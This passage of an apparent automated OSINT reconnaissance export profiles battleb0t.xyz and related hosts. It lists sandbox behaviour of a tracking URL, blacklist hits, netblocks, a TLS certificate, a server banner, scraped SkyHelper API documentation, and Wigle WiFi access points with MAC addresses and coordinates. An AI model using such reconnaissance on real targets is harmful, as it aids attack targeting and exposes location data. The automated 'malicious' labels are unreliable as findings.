72x72 segment length 16 progressive precision 8 1934x993 components 3" and extension "jpg"\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4" and extension "jpg"\n "business-man_1_.png" has type "PNG image data 475 x 665 8-bit/color RGBA non-interlaced" and extension "png"\n "NickCusworth_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 Exif Standard: [TIFF image data big-endian direntries=21 manufacturer=Canon model=Canon EOS 5D Mark III orientation=upper-left software=Microsoft Windows Photo Viewer 6.1.7600.16385 datetime=2013:11:04 12:20:51] baseline precision 8 148x197 components 3" and extension "jpg"\n "16_1_.png" has type "PNG image data 716 x 1016 8-bit/color RGBA non-interlaced" and extension "png"\n "joomla_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "evernote_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "adobe_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "youtube_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "googledrive_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "cisco_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "arrow_down_1_.png" has type "PNG image data 5 x 3 8-bit/color RGBA non-interlaced" and extension "png"\n "switcher_1_.png" has type "PNG image data 10 x 19 8-bit/color RGBA non-interlaced" and extension "png"\n "blank_1_.png" has type "PNG image data 1 x 1 1-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab641D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab641D.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df5204982cf225e3cc.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1e3592f5-ee3f-11ed-905e-080027ef242f}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "style-a984db922da29019ca5adc1e5082e607_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3"- [targetUID: N/A]\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4"- [targetUID: N/A]\n "business-man_1_.png" has type "PNG image data 475 x 66 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.57): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:0B:05) | 50.8897, 6.0563 |
| 2023-05-12 02:46:20 | Netblock Membership | No | RIPE | 10 | 0 | 2 | 0 | None | 185.199.111.0/24 | 185.199.111.153 |
| 2023-05-12 02:46:26 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url6314.mail.nmacc.com/ls/click?upn=8UUcZfoU9ErRYP5rNGtgbirLN8xfc6bsTdjhpYE9O-2B6oIJCVLBVNxEMl4-2FlyZEXgpIcvOIsLdFwMmNMQ6pyipe-2BlH6ndePI6TegprE8-2FJ5TmwBSGqtoSQiQZMd1uQY0F6EMbvgZh-2FB54nRmur1hYZXb9DpD9Uaqar8AQBxXE9ZjEMEh9pj-2FNvjiSungY8Q-2BcGAEny7iKKiiOMOE4TVnhf8f7XNNG4vkRAhHBxDpFamm0IUZWV3z-2BlJLtiqNZocaeHRbn9q5OE4HMTBuJibaMxdHmJJ9cRGPg-2BIJz-2B-2F91yqQCKhq-2FDCeLChTKA7jVwK1Ouq-2FKIU-2FYhbkgDECGCTTIYKgHXPh2b3OYH9i7a6eI-2FAKkoa5wVpo9vtL32nYWta9ahz5vfUQqJE7rCOt9gGu6vQWShZJVtaDn-2FX0jLeh5IgiUHxe3oW8VqyzM8ypTZLDWj1E59I1JQ-2FktSv0rVnoCoiAb7P30xuBJWLqQ5lH4zPSwzQWh3Y6TkFHvj3cGgCyLHEq7_-2BOt3qy6nPPD-2BvPBT7bVtLrj9wxQ6PC4uiKPO00-2BGDcq4vCUL9jBCG2rzUktFCBBsWM9VDFDukFJsAvP5a2wlNm-2B1xvIYADajgidXgITH2clnmESRV-2BBkImikTYnjRiXwX9u5aj8UOixtxqSLd-2FknigE7ztnUTNb3Hm824FaNuRAjgM7w7tvQQ-2FLlxjpwO7cilXlMlvOUXGvEp4LRn9miTC4WQr-2FP80gqygKVr2Fvg-2F0JMdrNJ9JhF-2BavQqh-2F-2FWWK6tHbATUsKwjMalzZjASsgacGT9IwTW20bAz3NvT70G-2Be6bq15tVuvaeOKAiaoD-2B-2BGHYAAjoEMPIehIdac8BFr1v89Rh5h21H4kub2usLmqC3yC76UJPWE-2FAg-2FkbKljLX7rc5p70-2BTWNNS0fqLYZDnQPX9DQ4opuM2QB21j2WThAg-2Fa6lCRxasFq-2FKDHL-2BKRb', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a1c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a1c_IESQMMUTEX_0_519"\n "IsoScope_a1c_IESQMMUTEX_0_303"\n "IsoScope_a1c_ConnHashTable<2588>_HashTable_Mutex"\n "IsoScope_a1c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2588"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a1c_IE_EarlyTabStart_0x9e8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.56:80"\n "108.139.1.6:443"\n "116.50.97.93:443"\n "185.199.111.153:443"\n "142.251.46.174:443"\n "172.217.12.106:443"\n "18.155.181.57:443"\n "172.217.12.104:443"\n "142.250.191.42:443"\n "157.240.22.25:443"\n "142.251.214.130:443"\n "142.250.191.78:443"\n "142.250.191.66:443"\n "116.50.93.136:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nmacc.com"\n "pchen66.github.io"\n "tickets.jioworldcentre.com"\n "url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"":signuphost:":"https://plus.google.com",ratingbadge:{url:"https://www.google.com/shopping/customerreviews/badge?usegapi=1"},appcirclepicker:{url:":socialhost:/:session_prefix:_/widget/render/appcirclepicker"},follow:{url:":socialhost:/:session_prefix:_/widget/render/follow?usegapi=1"},community:{url:":ctx_socialhost:/:session_prefix::im_prefix:_/widget/render/community?usegapi=1"},sharetoclassroom:{url:"https://classroom.google.com/sharewidget?usegapi=1"},ytshare:{params:{url:""},url:":socialhost:/:session_prefix:_/widget/render/ytshare?usegapi=1"}," (Indicator: "plus.google.com")\n "* [http://developers.facebook.com/policy/]. This copyright notice shall be" (Indicator: "facebook.com")\n "b,"vert.pix");break;case "PERCENT":Fy(d.verticalThresholds,b,"vert.pct")}Ev("sdl","init",!1)?Ev("sdl","pending",!1)||J(function(){return Gy()}):(Cv("sdl","init",!0),Cv("sdl","pending",!0),J(function(){Gy();if(Hy()){var e=Iy();qc(z,"scroll",e);qc(z,"resize",e)}else Cv("sdl","init",!1)}));return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "disableRealtimeCallback:!1,drive_share:{skipInitCommand:!0},csi:{rate:.01},client:{cors:!1},signInDeprecation:{rate:0},include_granted_scopes:!0,llang:"en",iframes:{youtube:{params:{location:["search","hash"]},url:":socialhost:/:session_prefix:_/widget/render/youtube?usegapi=1",methods:["scroll","openwindow"]},ytsubscribe:{url:"https://www.youtube.com/subscribe_embed?usegapi=1"},plus_circle:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/plus/circle?usegapi=1"},plus_share:{params:{url:""}," (Indicator: "youtube")\n "function My(a,b){var c=this;return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "l=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gf:d,Ef:e,Ff:f,lg:g,mg:h,gd:l,Xa:b},p=z.YT,q=function(){Vy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Yy(w,"iframe_api")||Yy(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Py&&Wy(x[A],n.gd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")\n "person:{url:":socialhost:/:session_prefix:_/widget/render/person?usegapi=1"},savetodrive:{url:"https://drive.google.com/savetodrivebutton?usegapi=1",methods:["save"]},page:{url:":socialhost:/:session_prefix:_/widget/render/page?usegapi=1"},card:{url:":socialhost:/:session_prefix:_/hovercard/card"}}},h:"m;/_/scs/abc-static/_/js/k=gapi.lb.en.zUi2Oiqh0cQ.O/d=1/rs=AHpOoo-VnflFHGTzk3OsaVpWbqz0Ysb2Jw/m=__features__",u:"https://apis.google.com/js/api.js",hee:!0,dpo:!1,le:["scs"],glrp:false},platform:"backdrop blogger comments commentcount community donation family_creation follow hangout health page partnersbadge person playemm playreview plus plusone post ratingbadge savetoandroidpay savetodrive savetowallet sharetoclassroom shortlists signin2 surveyoptin visibility youtube ytsubscribe zoomableimage".split(" ")," (Indicator: "youtube")\n "Py=!0,b});return b}Zy.M="internal.enableAutoEventOnYouTubeActivity";var $y;function az(a){var b=!1;return b}az.M="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},R(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Hh.ia+"&cx=c";hs()&&(f+="&sign="+Hh.se);var g=Qh||Zh?gs(b,f):void 0;g||(g=So("https://","http://",Hh.Gd+f));Cl().destination[a]={state:1,context:c};mc(g)}};function is(){if(xl()){return!0}return!1};var ls=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ms={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},ns={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Yv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,l){var n=a(),p=n.Lf,q=void 0!==l?Math.round(l):void 0!==h?Math.round(n.Lf*h):Math.round(n.Uh),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=H.hidden?!1:.5<=Hk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Av(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "main.4a45304c_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "api_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QA70RK48.txt" has type "ASCII text"- Location: [%APPDATA%\\Mic | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | KFA (Net ID: 00:00:CB:07:81:0E) | 50.1188, 8.6843 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://nuke.battleb0t.xyz | nuke.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5D:5F:35) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b8:46:5d:ac:6d:f3:78:e1:a9:4f:74:a7:83:2a:
f1:af:bd:cc:66:b6:b9:bf:84:6f:47:9b:97:1c:a8:
c9:7d:6c:fe:9e:8e:79:9c:a5:37:f9:7d:7a:a0:3b:
dd:dd:59:27:44:ef:fa:f9:9f:ac:5e:a7:96:85:d6:
12:a4:67:16:8a:d5:1c:b5:d1:2d:4e:c7:ec:3d:19:
e5:de:7b:f7:77:77:6b:39:f5:6c:f2:bc:49:15:e4:
d9:26:16:d0:09:ff:d0:9f:cc:e1:2f:72:cd:5d:49:
42:8f:44:ab:2b:64:2c:16:15:0b:c6:a8:c4:87:48:
5c:ca:2c:13:33:5b:9e:8f:26:9e:57:1a:3f:da:51:
8d:e5:86:b3:d8:b8:bb:9b:a8:35:c1:05:df:6d:60:
e8:57:86:af:77:94:58:18:ee:4d:cc:61:8e:ef:d8:
ae:1a:ad:73:4e:d6:21:83:54:e8:94:6d:be:b2:5a:
91:8d:86:36:60:55:a8:6c:ac:42:09:7d:39:a2:a8:
c7:4d:09:67:42:98:43:91:4c:6e:9c:44:89:71:c9:
81:24:98:ab:01:48:f5:7f:9f:03:76:19:5e:40:1f:
e2:a9:ac:0e:74:15:d2:c7:02:a6:94:0f:07:1e:c2:
8f:1c:65:ac:eb:0a:21:1c:42:25:eb:b3:3c:e5:3d:
0f:68:8a:07:35:fd:f2:bf:65:bb:27:0a:28:75:d7:
36:a5:f8:ad:87:2d:4d:e9:8c:44:1c:dd:e0:1f:f8:
19:b0:d2:ba:53:d4:71:e9:68:d3:d7:47:bd:bd:b3:
12:21:a8:7f:36:dd:3a:ee:09:ec:a7:f6:99:fc:9a:
ee:64:c3:e9:cb:48:8b:5b:53:b6:9a:34:49:ed:6f:
97:8c:71:a4:8f:ff:5a:94:b4:2f:23:08:04:1f:5f:
dd:ba:07:c4:98:26:ce:e7:92:3f:eb:aa:ca:85:d1:
9e:9d:66:9d:15:94:f9:a8:c4:87:5f:d8:0f:2a:bd:
f6:c1:3a:15:a4:4a:73:81:4d:25:59:6c:74:3c:88:
be:35:3a:e2:55:b7:aa:f2:6a:84:aa:03:d7:47:36:
8c:65:79:0d:82:62:5e:32:88:98:91:5f:e7:41:ad:
df:3b:04:9a:a4:b7:e8:4a:dc:51:e1:1a:2e:5f:80:
9f:10:99:df:13:16:07:60:53:0f:70:88:4d:8b:bf:
c2:83:ad:7d:95:a6:63:06:b5:f7:e1:fa:b4:f1:f2:
59:97:a4:23:6e:6f:a1:9d:e7:91:3c:8f:96:90:d0:
88:f8:42:7e:b9:a8:0b:95:b2:4a:f1:e1:43:89:bc:
d0:c5:6e:8d:7a:6f:1a:ac:22:35:41:3f:62:4c:b0:
b4:f9:c1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 18:26:23.061 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:9F:03:F2:57:29:1C:6C:CA:C4:B6:84:
A2:CF:DC:58:71:8F:BE:81:45:60:1F:FF:93:71:3F:A9:
CA:BA:3A:50:C4:02:21:00:90:64:F6:9F:F7:D4:4C:D2:
FE:1C:A7:11:20:05:5D:56:39:91:0A:7B:4C:62:39:AA:
64:BD:6C:3C:C2:FD:A1:0A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 18:26:23.103 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:4F:62:25:1A:58:98:9D:A9:66:2A:8C:9C:
A9:99:81:EC:02:DA:B6:46:5C:1C:8A:B1:7D:3E:50:EB:
79:AD:CA:D4:02:21:00:81:0A:60:C2:7A:18:38:E9:6B:
5A:5E:9B:C3:73:2D:B9:E6:6F:7E:07:33:77:3C:F6:0E:
B6:F2:86:95:8C:EA:B2
Signature Algorithm: sha256WithRSAEncryption
0b:32:93:ac:90:bf:47:b0:c4:55:e2:5d:67:21:f0:7b:a7:a4:
cd:66:48:4d:2c:f0:72:c8:d2:e0:06:52:3d:5f:5e:f3:6d:c2:
a4:d3:6b:9f:de:a7:3e:43:94:31:d9:2a:70:b4:d8:61:f6:f9:
5c:2f:4e:93:c9:e9:4f:53:93:2f:86:7b:1f:c9:8a:15:03:28:
96:52:6d:95:ef:a6:c5:d3:5e:db:a3:1b:da:98:f0:b3:d4:33:
b3:0c:25:74:63:ab:88:aa:ca:72:4f:f1:60:47:12:0c:e7:e7:
d2:30:3a:7a:16:b2:67:3a:08:9a:8f:2c:01:80:2f:d2:f1:29:
79:da:43:5d:f1:6e:ce:77:99:33:0f:bd:15:e0:aa:92:a8:51:
21:1e:1f:fc:62:be:58:aa:ad:ce:bf:14:e5:e6:0f:6c:ea:61:
2e:ce:4c:21:48:67:57:3a:f8:75:60:b1:d3:01:c6:eb:1e:96:
48:d4:7d:65:31:de:70:bc:f7:3f:bd:89:d2:15:4c:60:09:1a:
af:c6:86:cb:88:cd:d5:a5:55:42:cd:bd:22:96:61:43:7d:a3:
c6:84:39:52:19:c9:4c:63:fc:ed:7f:7b:3f:3c:68:62:f5:7a:
29:d5:7a:58:55:09:bd:cb:a0:f7:ad:61:48:d5:d6:97:fb:49:
c3:ed:97:11
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:63:F4) | 41.8781, -87.6298 |
| 2023-05-12 02:55:15 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: <REDACTED>
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
| 165.232.113.85 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
